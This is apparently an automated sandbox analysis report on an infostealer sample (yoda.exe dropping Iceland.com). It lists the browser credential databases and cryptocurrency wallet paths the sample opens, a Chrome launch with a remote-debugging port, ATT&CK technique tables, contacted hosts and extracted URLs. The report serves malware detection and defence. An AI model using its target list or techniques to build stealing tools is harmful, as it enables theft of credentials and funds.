                Source: Yara match File source: 0000000A.00000003.1950013637.0000000003795000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000003.1949965283.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2869693488.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: Iceland.com PID: 7592, type: MEMORYSTR
                Source: Iceland.com, 0000000A.00000002.2866383443.00000000007CD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *electrum*.*
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: window-state.json
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Exodus\
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: info.seco
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: passphrase.json
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
                Source: Iceland.com, 0000000A.00000002.2866383443.00000000007CD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *exodus*.*
                Source: Iceland.com, 0000000A.00000002.2866383443.00000000007CD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *ethereum*.*
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: MultiDoge
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: seed.seco
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: keystore
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Exodus\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Binance\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                Source: Iceland.com Binary or memory string: WIN_81
                Source: Iceland.com Binary or memory string: WIN_XP
                Source: Iceland.com.1.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Iceland.com Binary or memory string: WIN_XPe
                Source: Iceland.com Binary or memory string: WIN_VISTA
                Source: Iceland.com Binary or memory string: WIN_7
                Source: Iceland.com Binary or memory string: WIN_8
                Source: Yara match File source: 0000000A.00000002.2871233735.0000000003A4D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: Iceland.com PID: 7592, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: 10.2.Iceland.com.3970000.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000A.00000003.1950389528.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2871233735.0000000003971000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2868559733.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000003.1950013637.0000000003795000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000003.1949965283.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2869693488.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: Iceland.com PID: 7592, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00AA2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00AA1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: 21 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Extra Window Memory Injection; 2 Valid Accounts; 21 Access Token Manipulation; 12 Process Injection; Startup Items; Scheduled Task/Job; At; Cron
                Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Extra Window Memory Injection; 121 Masquerading; 2 Valid Accounts; 13 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 12 Process Injection
                Credential Access: 2 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: 2 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 37 System Information Discovery; 1 Query Registry; 241 Security Software Discovery; 13 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: 1 Archive Collected Data; 4 Data from Local System; 21 Input Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 1 Remote Access Software; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                Behavior Graph ID: 1581176, Sample: yoda.exe, Startdate: 27/12/2024, Architecture: WINDOWS, Score: 100 (graph image not preserved; process chain shown: yoda.exe -> cmd.exe -> Iceland.com -> chrome.exe)

                Source | Detection | Scanner | Label | Link
                yoda.exe | 33% | Virustotal | | Browse
                yoda.exe | 55% | ReversingLabs | Win32.Trojan.Generic |
                Source | Detection | Scanner | Label | Link
                C:\ProgramData\4EK6XL68GLNY\2NG4E3 | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\314782\Iceland.com | 0% | ReversingLabs | |
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://publickeyservice.gcp.privacysandboxservices.com | 0% | Avira URL Cloud | safe |
                http://anglebug.com/6876J | 0% | Avira URL Cloud | safe |
                http://anglebug.com/3586; | 0% | Avira URL Cloud | safe |
                http://anglebug.com/8229K | 0% | Avira URL Cloud | safe |
                http://anglebug.com/3502N | 0% | Avira URL Cloud | safe |
                https://bijutr.shopYMY58GLX | 0% | Avira URL Cloud | safe |
                http://anglebug.com/6755: | 0% | Avira URL Cloud | safe |
                http://anglebug.com/3452B | 0% | Avira URL Cloud | safe |
                https://bijutr.shopL68GLNYl | 0% | Avira URL Cloud | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                bijutr.shop | 188.245.216.205 | true | false | | high
                t.me | 149.154.167.99 | true | false | | high
                www.google.com | 172.217.21.36 | true | false | | high
                pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZe | unknown | unknown | false | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                            high
                                                                                                                                            https://issuetracker.google.com/161903006chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.ecosia.org/newtab/Iceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drfalse
                                                                                                                                                high
                                                                                                                                                https://drive-daily-1.corp.google.com/chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://drive-daily-5.corp.google.com/chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://duckduckgo.com/favicon.icochrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 0000000F.00000002.2215589639.00000278004EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2220472221.0000027801074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 0000000F.00000002.2216467397.0000027800754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217810916.0000027800B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217177896.0000027800950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215455608.000002780048C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://anglebug.com/3078chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://anglebug.com/7553chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://anglebug.com/5375chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://anglebug.com/5371chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://anglebug.com/4722chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://m.google.com/devicemanagement/data/apichrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 0000000F.00000002.2215589639.00000278004EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2220472221.0000027801074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoresent.chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://anglebug.com/7556chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://chromewebstore.google.com/chrome.exe, 0000000F.00000002.2213920187.000002780002C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://drive-preprod.corp.google.com/chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://bijutr.shopL68GLNYlIceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesIceland.com, 0000000A.00000002.2868129868.0000000000E85000.00000004.00000020.00020000.00000000.sdmp, HVAI5F.10.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://clients4.google.com/chrome-syncchrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
